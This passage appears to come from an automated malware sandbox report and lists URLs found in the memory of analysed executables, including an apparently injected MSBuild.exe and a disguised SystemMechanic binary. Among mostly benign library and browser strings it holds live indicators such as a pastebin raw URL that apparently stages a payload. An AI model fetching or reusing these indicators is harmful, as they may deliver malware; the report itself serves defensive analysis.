0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003009000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000309D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024937302.00000240F5575000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.comd
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: MSBuild.exe, 00000012.00000002.2405611907.0000000002811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: MSBuild.exe, 00000012.00000002.2405611907.0000000002811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQPOdq8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3033911115.00000240F78A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.4
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3069494325.00000240FBF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080796000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u5c4.0.exe, 00000001.00000003.1842333897.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u5c4.0.exe, 00000001.00000003.1842333897.00000000245BD000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com0p5
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000318F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000041E5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040CB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080452000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/e
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u5c4.0.exe, 00000001.00000003.2225747415.000000002A7D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
